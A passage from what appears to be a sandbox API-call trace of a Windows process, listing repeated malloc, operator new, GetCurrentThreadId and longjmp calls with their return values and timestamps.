	[0055.646] malloc (_Size=0x80) returned 0x3c8790
	[0055.647] GetCurrentThreadId () returned 0x9a8
	[0055.647] GetCurrentThreadId () returned 0x9a8
	[0055.647] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0055.647] malloc (_Size=0x80) returned 0x3c8dc0
	[0055.668] GetCurrentThreadId () returned 0x9a8
	[0055.668] GetCurrentThreadId () returned 0x9a8
	[0055.668] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0055.668] malloc (_Size=0x80) returned 0x3c8e50
	[0055.670] GetCurrentThreadId () returned 0x9a8
	[0055.670] GetCurrentThreadId () returned 0x9a8
	[0055.670] ??2@YAPEAX_K@Z () returned 0x3e4900
	[0055.670] malloc (_Size=0x80) returned 0x3c8d30
	[0055.906] GetCurrentThreadId () returned 0x9a8
	[0055.906] GetCurrentThreadId () returned 0x9a8
	[0055.906] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0055.906] malloc (_Size=0x80) returned 0x3c84c0
	[0055.906] GetCurrentThreadId () returned 0x9a8
	[0055.906] GetCurrentThreadId () returned 0x9a8
	[0055.906] ??2@YAPEAX_K@Z () returned 0x3e4900
	[0055.907] malloc (_Size=0x80) returned 0x3c85e0
	[0055.907] GetCurrentThreadId () returned 0x9a8
	[0055.907] GetCurrentThreadId () returned 0x9a8
	[0055.907] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0055.907] malloc (_Size=0x80) returned 0x3c8ee0
	[0055.908] GetCurrentThreadId () returned 0x9a8
	[0055.908] GetCurrentThreadId () returned 0x9a8
	[0055.908] ??2@YAPEAX_K@Z () returned 0x3e4800
	[0055.908] malloc (_Size=0x80) returned 0x3c9120
	[0055.908] GetCurrentThreadId () returned 0x9a8
	[0055.909] GetCurrentThreadId () returned 0x9a8
	[0055.909] ??2@YAPEAX_K@Z () returned 0x3e4b00
	[0055.909] malloc (_Size=0x80) returned 0x3c8f70
	[0055.909] GetCurrentThreadId () returned 0x9a8
	[0055.909] GetCurrentThreadId () returned 0x9a8
	[0055.909] ??2@YAPEAX_K@Z () returned 0x3e4c00
	[0055.909] malloc (_Size=0x80) returned 0x3c9240
	[0055.910] GetCurrentThreadId () returned 0x9a8
	[0055.910] GetCurrentThreadId () returned 0x9a8
	[0055.910] ??2@YAPEAX_K@Z () returned 0x3e4d00
	[0055.910] malloc (_Size=0x80) returned 0x3c9360
	[0055.910] GetCurrentThreadId () returned 0x9a8
	[0055.910] GetCurrentThreadId () returned 0x9a8
	[0055.910] ??2@YAPEAX_K@Z () returned 0x3e4e00
	[0055.910] malloc (_Size=0x80) returned 0x3c9480
	[0055.911] GetCurrentThreadId () returned 0x9a8
	[0055.922] GetCurrentThreadId () returned 0x9a8
	[0055.922] ??2@YAPEAX_K@Z () returned 0x3e4f00
	[0055.922] malloc (_Size=0x80) returned 0x3c95a0
	[0055.925] GetCurrentThreadId () returned 0x9a8
	[0055.925] GetCurrentThreadId () returned 0x9a8
	[0055.925] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0055.925] malloc (_Size=0x80) returned 0x3c84c0
	[0055.931] GetCurrentThreadId () returned 0x9a8
	[0055.932] GetCurrentThreadId () returned 0x9a8
	[0055.932] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0055.932] malloc (_Size=0x80) returned 0x3c8550
	[0055.932] GetCurrentThreadId () returned 0x9a8
	[0055.932] GetCurrentThreadId () returned 0x9a8
	[0055.932] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0055.932] malloc (_Size=0x80) returned 0x3c84c0
	[0055.969] GetCurrentThreadId () returned 0x9a8
	[0055.969] GetCurrentThreadId () returned 0x9a8
	[0055.969] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0055.969] malloc (_Size=0x80) returned 0x3c8940
	[0055.971] GetCurrentThreadId () returned 0x9a8
	[0055.971] GetCurrentThreadId () returned 0x9a8
	[0055.971] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0055.971] malloc (_Size=0x80) returned 0x3c84c0
	[0055.974] GetCurrentThreadId () returned 0x9a8
	[0055.974] GetCurrentThreadId () returned 0x9a8
	[0055.974] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0055.974] malloc (_Size=0x80) returned 0x3c8940
	[0055.974] GetCurrentThreadId () returned 0x9a8
	[0055.974] GetCurrentThreadId () returned 0x9a8
	[0055.974] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0055.974] malloc (_Size=0x80) returned 0x3c8550
	[0055.975] GetCurrentThreadId () returned 0x9a8
	[0055.975] GetCurrentThreadId () returned 0x9a8
	[0055.975] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0055.975] malloc (_Size=0x80) returned 0x3c8af0
	[0055.979] GetCurrentThreadId () returned 0x9a8
	[0055.979] GetCurrentThreadId () returned 0x9a8
	[0055.979] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0055.979] malloc (_Size=0x80) returned 0x3c8dc0
	[0055.983] GetCurrentThreadId () returned 0x9a8
	[0055.983] GetCurrentThreadId () returned 0x9a8
	[0055.983] ??2@YAPEAX_K@Z () returned 0x3e4900
	[0055.983] malloc (_Size=0x80) returned 0x3c85e0
	[0055.983] GetCurrentThreadId () returned 0x9a8
	[0055.983] GetCurrentThreadId () returned 0x9a8
	[0055.983] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0055.983] malloc (_Size=0x80) returned 0x3c8ee0
	[0055.986] GetCurrentThreadId () returned 0x9a8
	[0055.986] GetCurrentThreadId () returned 0x9a8
	[0055.986] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0055.986] malloc (_Size=0x80) returned 0x3c8700
	[0055.992] GetCurrentThreadId () returned 0x9a8
	[0055.992] GetCurrentThreadId () returned 0x9a8
	[0055.992] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0055.992] malloc (_Size=0x80) returned 0x3c8790
	[0055.997] GetCurrentThreadId () returned 0x9a8
	[0055.997] GetCurrentThreadId () returned 0x9a8
	[0055.997] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0055.997] malloc (_Size=0x80) returned 0x3c8700
	[0056.001] GetCurrentThreadId () returned 0x9a8
	[0056.001] GetCurrentThreadId () returned 0x9a8
	[0056.001] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0056.001] malloc (_Size=0x80) returned 0x3c8d30
	[0056.003] GetCurrentThreadId () returned 0x9a8
	[0056.003] GetCurrentThreadId () returned 0x9a8
	[0056.003] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0056.003] malloc (_Size=0x80) returned 0x3c8ee0
	[0056.004] GetCurrentThreadId () returned 0x9a8
	[0056.004] GetCurrentThreadId () returned 0x9a8
	[0056.004] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0056.005] malloc (_Size=0x80) returned 0x3c8700
	[0056.006] GetCurrentThreadId () returned 0x9a8
	[0056.006] GetCurrentThreadId () returned 0x9a8
	[0056.006] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0056.006] malloc (_Size=0x80) returned 0x3c8d30
	[0056.031] GetCurrentThreadId () returned 0x9a8
	[0056.032] GetCurrentThreadId () returned 0x9a8
	[0056.032] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.032] malloc (_Size=0x80) returned 0x3c84c0
	[0056.035] GetCurrentThreadId () returned 0x9a8
	[0056.035] GetCurrentThreadId () returned 0x9a8
	[0056.035] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.035] malloc (_Size=0x80) returned 0x3c8c10
	[0056.036] GetCurrentThreadId () returned 0x9a8
	[0056.036] GetCurrentThreadId () returned 0x9a8
	[0056.036] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0056.036] malloc (_Size=0x80) returned 0x3c8e50
	[0056.039] GetCurrentThreadId () returned 0x9a8
	[0056.039] GetCurrentThreadId () returned 0x9a8
	[0056.039] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.039] malloc (_Size=0x80) returned 0x3c8550
	[0056.041] GetCurrentThreadId () returned 0x9a8
	[0056.041] GetCurrentThreadId () returned 0x9a8
	[0056.041] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.041] malloc (_Size=0x80) returned 0x3c8a60
	[0056.042] GetCurrentThreadId () returned 0x9a8
	[0056.042] GetCurrentThreadId () returned 0x9a8
	[0056.042] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.042] malloc (_Size=0x80) returned 0x3c8310
	[0056.043] GetCurrentThreadId () returned 0x9a8
	[0056.043] GetCurrentThreadId () returned 0x9a8
	[0056.043] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.043] malloc (_Size=0x80) returned 0x3c8af0
	[0056.050] longjmp () 
	[0056.052] GetCurrentThreadId () returned 0x9a8
	[0056.052] GetCurrentThreadId () returned 0x9a8
	[0056.052] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.052] malloc (_Size=0x80) returned 0x3c8940
	[0056.053] GetCurrentThreadId () returned 0x9a8
	[0056.053] GetCurrentThreadId () returned 0x9a8
	[0056.053] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.053] malloc (_Size=0x80) returned 0x3c8310
	[0056.053] GetCurrentThreadId () returned 0x9a8
	[0056.053] GetCurrentThreadId () returned 0x9a8
	[0056.053] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.053] malloc (_Size=0x80) returned 0x3c8e50
	[0056.057] GetCurrentThreadId () returned 0x9a8
	[0056.057] GetCurrentThreadId () returned 0x9a8
	[0056.057] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.057] malloc (_Size=0x80) returned 0x3c8dc0
	[0056.059] GetCurrentThreadId () returned 0x9a8
	[0056.059] GetCurrentThreadId () returned 0x9a8
	[0056.059] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.059] malloc (_Size=0x80) returned 0x3c8a60
	[0056.059] GetCurrentThreadId () returned 0x9a8
	[0056.059] GetCurrentThreadId () returned 0x9a8
	[0056.059] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.059] malloc (_Size=0x80) returned 0x3c8dc0
	[0056.062] GetCurrentThreadId () returned 0x9a8
	[0056.062] GetCurrentThreadId () returned 0x9a8
	[0056.062] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0056.062] malloc (_Size=0x80) returned 0x3c85e0
	[0056.068] GetCurrentThreadId () returned 0x9a8
	[0056.068] GetCurrentThreadId () returned 0x9a8
	[0056.068] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.068] malloc (_Size=0x80) returned 0x3c8e50
	[0056.069] GetCurrentThreadId () returned 0x9a8
	[0056.069] GetCurrentThreadId () returned 0x9a8
	[0056.069] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.069] malloc (_Size=0x80) returned 0x3c8a60
	[0056.113] GetCurrentThreadId () returned 0x9a8
	[0056.113] GetCurrentThreadId () returned 0x9a8
	[0056.113] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.113] malloc (_Size=0x80) returned 0x3c84c0
	[0056.113] GetCurrentThreadId () returned 0x9a8
	[0056.113] GetCurrentThreadId () returned 0x9a8
	[0056.113] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.113] malloc (_Size=0x80) returned 0x3c8dc0
	[0056.119] GetCurrentThreadId () returned 0x9a8
	[0056.119] GetCurrentThreadId () returned 0x9a8
	[0056.119] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.119] malloc (_Size=0x80) returned 0x3c8a60
	[0056.119] GetCurrentThreadId () returned 0x9a8
	[0056.119] GetCurrentThreadId () returned 0x9a8
	[0056.119] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.119] malloc (_Size=0x80) returned 0x3c8dc0
	[0056.121] GetCurrentThreadId () returned 0x9a8
	[0056.121] GetCurrentThreadId () returned 0x9a8
	[0056.121] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.121] malloc (_Size=0x80) returned 0x3c8550
	[0056.122] GetCurrentThreadId () returned 0x9a8
	[0056.122] GetCurrentThreadId () returned 0x9a8
	[0056.122] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0056.122] malloc (_Size=0x80) returned 0x3c8c10
	[0056.126] GetCurrentThreadId () returned 0x9a8
	[0056.126] GetCurrentThreadId () returned 0x9a8
	[0056.126] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.126] malloc (_Size=0x80) returned 0x3c8e50
	[0056.129] GetCurrentThreadId () returned 0x9a8
	[0056.129] GetCurrentThreadId () returned 0x9a8
	[0056.129] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.129] malloc (_Size=0x80) returned 0x3c8310
	[0056.129] GetCurrentThreadId () returned 0x9a8
	[0056.129] GetCurrentThreadId () returned 0x9a8
	[0056.129] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.129] malloc (_Size=0x80) returned 0x3c85e0
	[0056.130] GetCurrentThreadId () returned 0x9a8
	[0056.130] GetCurrentThreadId () returned 0x9a8
	[0056.130] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.130] malloc (_Size=0x80) returned 0x3c8820
	[0056.132] GetCurrentThreadId () returned 0x9a8
	[0056.132] GetCurrentThreadId () returned 0x9a8
	[0056.132] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0056.132] malloc (_Size=0x80) returned 0x3c84c0
	[0056.134] GetCurrentThreadId () returned 0x9a8
	[0056.134] GetCurrentThreadId () returned 0x9a8
	[0056.134] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.134] malloc (_Size=0x80) returned 0x3c8550
	[0056.134] GetCurrentThreadId () returned 0x9a8
	[0056.134] GetCurrentThreadId () returned 0x9a8
	[0056.134] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.134] malloc (_Size=0x80) returned 0x3c8c10
	[0056.135] GetCurrentThreadId () returned 0x9a8
	[0056.135] GetCurrentThreadId () returned 0x9a8
	[0056.135] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.135] malloc (_Size=0x80) returned 0x3c8a60
	[0056.136] GetCurrentThreadId () returned 0x9a8
	[0056.136] GetCurrentThreadId () returned 0x9a8
	[0056.136] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.137] malloc (_Size=0x80) returned 0x3c8a60
	[0056.140] GetCurrentThreadId () returned 0x9a8
	[0056.140] GetCurrentThreadId () returned 0x9a8
	[0056.140] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.140] malloc (_Size=0x80) returned 0x3c8430
	[0056.141] GetCurrentThreadId () returned 0x9a8
	[0056.141] GetCurrentThreadId () returned 0x9a8
	[0056.141] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.141] malloc (_Size=0x80) returned 0x3c85e0
	[0056.141] GetCurrentThreadId () returned 0x9a8
	[0056.141] GetCurrentThreadId () returned 0x9a8
	[0056.141] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.141] malloc (_Size=0x80) returned 0x3c8c10
	[0056.142] GetCurrentThreadId () returned 0x9a8
	[0056.142] GetCurrentThreadId () returned 0x9a8
	[0056.142] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.142] malloc (_Size=0x80) returned 0x3c8dc0
	[0056.142] GetCurrentThreadId () returned 0x9a8
	[0056.142] GetCurrentThreadId () returned 0x9a8
	[0056.142] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0056.142] malloc (_Size=0x80) returned 0x3c84c0
	[0056.143] GetCurrentThreadId () returned 0x9a8
	[0056.143] GetCurrentThreadId () returned 0x9a8
	[0056.143] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0056.143] malloc (_Size=0x80) returned 0x3c8700
	[0056.145] GetCurrentThreadId () returned 0x9a8
	[0056.145] GetCurrentThreadId () returned 0x9a8
	[0056.145] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.145] malloc (_Size=0x80) returned 0x3c85e0
	[0056.146] GetCurrentThreadId () returned 0x9a8
	[0056.146] GetCurrentThreadId () returned 0x9a8
	[0056.146] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.146] malloc (_Size=0x80) returned 0x3c8550
	[0056.146] GetCurrentThreadId () returned 0x9a8
	[0056.146] GetCurrentThreadId () returned 0x9a8
	[0056.147] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.147] malloc (_Size=0x80) returned 0x3c8820
	[0056.153] GetCurrentThreadId () returned 0x9a8
	[0056.153] GetCurrentThreadId () returned 0x9a8
	[0056.153] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.153] malloc (_Size=0x80) returned 0x3c8310
	[0056.153] GetCurrentThreadId () returned 0x9a8
	[0056.153] GetCurrentThreadId () returned 0x9a8
	[0056.153] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.153] malloc (_Size=0x80) returned 0x3c8dc0
	[0056.155] GetCurrentThreadId () returned 0x9a8
	[0056.155] GetCurrentThreadId () returned 0x9a8
	[0056.155] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.155] malloc (_Size=0x80) returned 0x3c8dc0
	[0056.158] GetCurrentThreadId () returned 0x9a8
	[0056.158] GetCurrentThreadId () returned 0x9a8
	[0056.158] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.158] malloc (_Size=0x80) returned 0x3c8a60
	[0056.158] GetCurrentThreadId () returned 0x9a8
	[0056.158] GetCurrentThreadId () returned 0x9a8
	[0056.158] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.158] malloc (_Size=0x80) returned 0x3c8c10
	[0056.159] GetCurrentThreadId () returned 0x9a8
	[0056.159] GetCurrentThreadId () returned 0x9a8
	[0056.159] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0056.159] malloc (_Size=0x80) returned 0x3c84c0
	[0056.165] GetCurrentThreadId () returned 0x9a8
	[0056.165] GetCurrentThreadId () returned 0x9a8
	[0056.165] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.165] malloc (_Size=0x80) returned 0x3c8550
	[0056.165] GetCurrentThreadId () returned 0x9a8
	[0056.165] GetCurrentThreadId () returned 0x9a8
	[0056.165] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0056.165] malloc (_Size=0x80) returned 0x3c8700
	[0056.168] GetCurrentThreadId () returned 0x9a8
	[0056.168] GetCurrentThreadId () returned 0x9a8
	[0056.168] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.168] malloc (_Size=0x80) returned 0x3c8550
	[0056.168] GetCurrentThreadId () returned 0x9a8
	[0056.168] GetCurrentThreadId () returned 0x9a8
	[0056.169] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.169] malloc (_Size=0x80) returned 0x3c8700
	[0056.170] GetCurrentThreadId () returned 0x9a8
	[0056.170] GetCurrentThreadId () returned 0x9a8
	[0056.170] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.170] malloc (_Size=0x80) returned 0x3c8c10
	[0056.170] GetCurrentThreadId () returned 0x9a8
	[0056.170] GetCurrentThreadId () returned 0x9a8
	[0056.170] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.170] malloc (_Size=0x80) returned 0x3c8310
	[0056.171] GetCurrentThreadId () returned 0x9a8
	[0056.171] GetCurrentThreadId () returned 0x9a8
	[0056.171] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0056.171] malloc (_Size=0x80) returned 0x3c84c0
	[0056.174] GetCurrentThreadId () returned 0x9a8
	[0056.174] GetCurrentThreadId () returned 0x9a8
	[0056.174] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.174] malloc (_Size=0x80) returned 0x3c8a60
	[0056.186] GetCurrentThreadId () returned 0x9a8
	[0056.186] GetCurrentThreadId () returned 0x9a8
	[0056.186] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.186] malloc (_Size=0x80) returned 0x3c8550
	[0056.210] GetCurrentThreadId () returned 0x9a8
	[0056.210] GetCurrentThreadId () returned 0x9a8
	[0056.210] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.210] malloc (_Size=0x80) returned 0x3c8310
	[0056.210] GetCurrentThreadId () returned 0x9a8
	[0056.210] GetCurrentThreadId () returned 0x9a8
	[0056.210] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.210] malloc (_Size=0x80) returned 0x3c8a60
	[0056.215] GetCurrentThreadId () returned 0x9a8
	[0056.215] GetCurrentThreadId () returned 0x9a8
	[0056.215] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.215] malloc (_Size=0x80) returned 0x3c8a60
	[0056.215] GetCurrentThreadId () returned 0x9a8
	[0056.215] GetCurrentThreadId () returned 0x9a8
	[0056.215] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.215] malloc (_Size=0x80) returned 0x3c8700
	[0056.241] GetCurrentThreadId () returned 0x9a8
	[0056.241] GetCurrentThreadId () returned 0x9a8
	[0056.241] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.241] malloc (_Size=0x80) returned 0x3c8dc0
	[0056.242] GetCurrentThreadId () returned 0x9a8
	[0056.242] GetCurrentThreadId () returned 0x9a8
	[0056.242] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.242] malloc (_Size=0x80) returned 0x3c8c10
	[0056.246] GetCurrentThreadId () returned 0x9a8
	[0056.246] GetCurrentThreadId () returned 0x9a8
	[0056.246] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.246] malloc (_Size=0x80) returned 0x3c8700
	[0056.248] GetCurrentThreadId () returned 0x9a8
	[0056.248] GetCurrentThreadId () returned 0x9a8
	[0056.248] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.248] malloc (_Size=0x80) returned 0x3c8c10
	[0056.297] GetCurrentThreadId () returned 0x9a8
	[0056.297] GetCurrentThreadId () returned 0x9a8
	[0056.297] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.297] malloc (_Size=0x80) returned 0x3c84c0
	[0056.298] GetCurrentThreadId () returned 0x9a8
	[0056.298] GetCurrentThreadId () returned 0x9a8
	[0056.298] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0056.298] malloc (_Size=0x80) returned 0x3c8820
	[0056.298] GetCurrentThreadId () returned 0x9a8
	[0056.298] GetCurrentThreadId () returned 0x9a8
	[0056.298] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0056.298] malloc (_Size=0x80) returned 0x3c8d30
	[0056.319] GetCurrentThreadId () returned 0x9a8
	[0056.319] GetCurrentThreadId () returned 0x9a8
	[0056.319] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.319] malloc (_Size=0x80) returned 0x3c8550
	[0056.321] GetCurrentThreadId () returned 0x9a8
	[0056.321] GetCurrentThreadId () returned 0x9a8
	[0056.321] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.321] malloc (_Size=0x80) returned 0x3c8700
	[0056.324] GetCurrentThreadId () returned 0x9a8
	[0056.324] GetCurrentThreadId () returned 0x9a8
	[0056.324] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.324] malloc (_Size=0x80) returned 0x3c8a60
	[0056.327] GetCurrentThreadId () returned 0x9a8
	[0056.327] GetCurrentThreadId () returned 0x9a8
	[0056.327] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.327] malloc (_Size=0x80) returned 0x3c8c10
	[0056.333] GetCurrentThreadId () returned 0x9a8
	[0056.333] GetCurrentThreadId () returned 0x9a8
	[0056.334] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0056.334] malloc (_Size=0x80) returned 0x3c8d30
	[0056.342] GetCurrentThreadId () returned 0x9a8
	[0056.342] GetCurrentThreadId () returned 0x9a8
	[0056.342] ??2@YAPEAX_K@Z () returned 0x3e4800
	[0056.342] malloc (_Size=0x80) returned 0x3c8790
	[0056.342] GetCurrentThreadId () returned 0x9a8
	[0056.343] GetCurrentThreadId () returned 0x9a8
	[0056.343] ??2@YAPEAX_K@Z () returned 0x3e4b00
	[0056.343] malloc (_Size=0x80) returned 0x3c8ee0
	[0056.347] GetCurrentThreadId () returned 0x9a8
	[0056.347] GetCurrentThreadId () returned 0x9a8
	[0056.347] ??2@YAPEAX_K@Z () returned 0x3e4c00
	[0056.347] malloc (_Size=0x80) returned 0x3c91b0
	[0056.373] longjmp () 
	[0056.376] longjmp () 
	[0056.376] GetCurrentThreadId () returned 0x9a8
	[0056.376] GetCurrentThreadId () returned 0x9a8
	[0056.376] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.376] malloc (_Size=0x80) returned 0x3c8b80
	[0056.377] GetCurrentThreadId () returned 0x9a8
	[0056.377] GetCurrentThreadId () returned 0x9a8
	[0056.377] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.377] malloc (_Size=0x80) returned 0x3c85e0
	[0056.383] GetCurrentThreadId () returned 0x9a8
	[0056.383] GetCurrentThreadId () returned 0x9a8
	[0056.383] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.383] malloc (_Size=0x80) returned 0x3c85e0
	[0056.383] longjmp () 
	[0056.383] longjmp () 
	[0056.384] GetCurrentThreadId () returned 0x9a8
	[0056.384] GetCurrentThreadId () returned 0x9a8
	[0056.384] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.384] malloc (_Size=0x80) returned 0x3c8e50
	[0056.386] longjmp () 
	[0056.388] GetCurrentThreadId () returned 0x9a8
	[0056.388] GetCurrentThreadId () returned 0x9a8
	[0056.388] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.388] malloc (_Size=0x80) returned 0x3c8700
	[0056.388] GetCurrentThreadId () returned 0x9a8
	[0056.388] GetCurrentThreadId () returned 0x9a8
	[0056.388] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.388] malloc (_Size=0x80) returned 0x3c8550
	[0056.388] GetCurrentThreadId () returned 0x9a8
	[0056.388] GetCurrentThreadId () returned 0x9a8
	[0056.388] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.388] malloc (_Size=0x80) returned 0x3c8a60
	[0056.389] GetCurrentThreadId () returned 0x9a8
	[0056.389] GetCurrentThreadId () returned 0x9a8
	[0056.389] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.390] malloc (_Size=0x80) returned 0x3c8c10
	[0056.390] GetCurrentThreadId () returned 0x9a8
	[0056.390] GetCurrentThreadId () returned 0x9a8
	[0056.390] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0056.390] malloc (_Size=0x80) returned 0x3c8d30
	[0056.397] GetCurrentThreadId () returned 0x9a8
	[0056.397] GetCurrentThreadId () returned 0x9a8
	[0056.397] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.397] malloc (_Size=0x80) returned 0x3c8700
	[0056.414] longjmp () 
	[0056.417] longjmp () 
	[0056.418] longjmp () 
	[0056.418] GetCurrentThreadId () returned 0x9a8
	[0056.418] GetCurrentThreadId () returned 0x9a8
	[0056.418] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.418] malloc (_Size=0x80) returned 0x3c83a0
	[0056.418] GetCurrentThreadId () returned 0x9a8
	[0056.418] GetCurrentThreadId () returned 0x9a8
	[0056.418] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.418] malloc (_Size=0x80) returned 0x3c8e50
	[0056.419] GetCurrentThreadId () returned 0x9a8
	[0056.419] GetCurrentThreadId () returned 0x9a8
	[0056.419] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.419] malloc (_Size=0x80) returned 0x3c8940
	[0056.425] longjmp () 
	[0056.425] longjmp () 
	[0056.426] longjmp () 
	[0056.427] longjmp () 
	[0056.427] longjmp () 
	[0056.427] GetCurrentThreadId () returned 0x9a8
	[0056.427] GetCurrentThreadId () returned 0x9a8
	[0056.427] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.427] malloc (_Size=0x80) returned 0x3c8700
	[0056.428] GetCurrentThreadId () returned 0x9a8
	[0056.428] GetCurrentThreadId () returned 0x9a8
	[0056.428] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.428] malloc (_Size=0x80) returned 0x3c85e0
	[0056.429] GetCurrentThreadId () returned 0x9a8
	[0056.429] GetCurrentThreadId () returned 0x9a8
	[0056.429] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.429] malloc (_Size=0x80) returned 0x3c8550
	[0056.431] GetCurrentThreadId () returned 0x9a8
	[0056.431] GetCurrentThreadId () returned 0x9a8
	[0056.431] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.431] malloc (_Size=0x80) returned 0x3c8940
	[0056.434] GetCurrentThreadId () returned 0x9a8
	[0056.434] GetCurrentThreadId () returned 0x9a8
	[0056.434] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0056.434] malloc (_Size=0x80) returned 0x3c8b80
	[0056.434] GetCurrentThreadId () returned 0x9a8
	[0056.434] GetCurrentThreadId () returned 0x9a8
	[0056.434] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.434] malloc (_Size=0x80) returned 0x3c85e0
	[0056.435] GetCurrentThreadId () returned 0x9a8
	[0056.435] GetCurrentThreadId () returned 0x9a8
	[0056.435] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.435] malloc (_Size=0x80) returned 0x3c83a0
	[0056.435] GetCurrentThreadId () returned 0x9a8
	[0056.435] GetCurrentThreadId () returned 0x9a8
	[0056.435] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.435] malloc (_Size=0x80) returned 0x3c8550
	[0056.435] GetCurrentThreadId () returned 0x9a8
	[0056.436] GetCurrentThreadId () returned 0x9a8
	[0056.436] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.436] malloc (_Size=0x80) returned 0x3c8310
	[0056.436] GetCurrentThreadId () returned 0x9a8
